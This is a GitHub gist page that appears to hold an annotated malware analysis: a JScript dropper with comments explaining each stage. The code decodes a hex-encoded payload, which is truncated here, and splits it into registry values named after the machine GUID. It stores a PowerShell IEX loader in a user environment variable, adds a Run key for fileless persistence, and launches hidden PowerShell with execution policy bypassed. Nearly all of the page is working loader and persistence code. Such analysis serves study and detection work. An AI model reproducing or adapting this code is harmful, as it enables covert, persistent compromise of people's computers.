-
-
Save malwarezone/f5b86308bd7ae33e8bad72686a91f2e5 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Obfuscated payload (the next stage, containing the PE): | |
#> | |
var obf_data1 = 'B323232323230237D202075656C635D2[...]'; | |
<# | |
initialize: | |
#> | |
shell_app = WScript.CreateObject("shell.application"); | |
fs_obj = new ActiveXObject("Scripting.FileSystemObject"); | |
<# | |
decode the obfuscated content: | |
#> | |
var stage2 = obf_data1.split("").reverse().join(""); | |
stage3 = ''; | |
for (i = 0; i < (stage2.length / 2); i++) { | |
stage3 += String.fromCharCode('0x' + stage2.substr(i * 2, 2)); | |
} | |
var shell_obj = WScript.CreateObject("WScript.Shell"); | |
<# | |
create the name of the key based on the Machine Guid: | |
#> | |
machine_guid = shell_obj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid"); | |
var pattern = /\-|[0-9]/g; | |
machine_guid = "A" + machine_guid.replace(pattern, ""); | |
my_key = machine_guid.toLowerCase(); | |
is_fresh = 0; | |
<# | |
check if the key already exist: | |
#> | |
try { | |
shell_obj.RegRead("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\"); | |
} catch (err) { | |
is_fresh = 1; | |
shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\", "", "REG_SZ"); | |
} | |
if (is_fresh == 1) { | |
<# | |
Divide the content on chunks and store it in form of registry keys: | |
#> | |
chunk = ''; | |
counter = 0; | |
for (var i = 0; i <= stage3.length - 1; i++) { | |
chunk = chunk + stage3.substring(i, i + 1); | |
if (chunk.length == 4000) { | |
shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\" + counter, chunk, "REG_SZ"); | |
counter = counter + 1; | |
chunk = ''; | |
} | |
} | |
<# | |
Write the last chunk: | |
#> | |
if (chunk.length > 0) { | |
counter = counter + 1; | |
shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\" + counter, chunk, "REG_SZ"); | |
} | |
<# | |
Fetch the PowerShell path: | |
#> | |
if (fs_obj.FolderExists("C:\\Program Files (x86)")) { | |
var powershell_path = 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'; | |
} else { | |
var powershell_path = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'; | |
} | |
<# | |
Save the command for reading the saved keys one by one: | |
#> | |
ps_cmd1 = 'for ($i=0;$i -le 500;$i++){Try{$abc=$abc+(Get-ItemProperty -path \'HKCU:\\SOFTWARE\\' + my_key + '\').$i}Catch{}}IEX($abc)'; | |
shell_obj.RegWrite("HKEY_CURRENT_USER\\Environment\\" + my_key, ps_cmd1, "REG_EXPAND_SZ"); | |
ps_cmd2 = '-ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable(\'' + my_key + '\', \'User\'))"'; | |
<# | |
Add the Run key for (fileless) persistence: | |
#> | |
shell_obj.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + my_key, powershell_path + ' ' + ps_cmd2, "REG_SZ"); | |
<# | |
Run the same powershell command immediately (as in the case of persistence): | |
#> | |
shell_app.ShellExecute(powershell_path, ps_cmd2, "", "open", 0); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment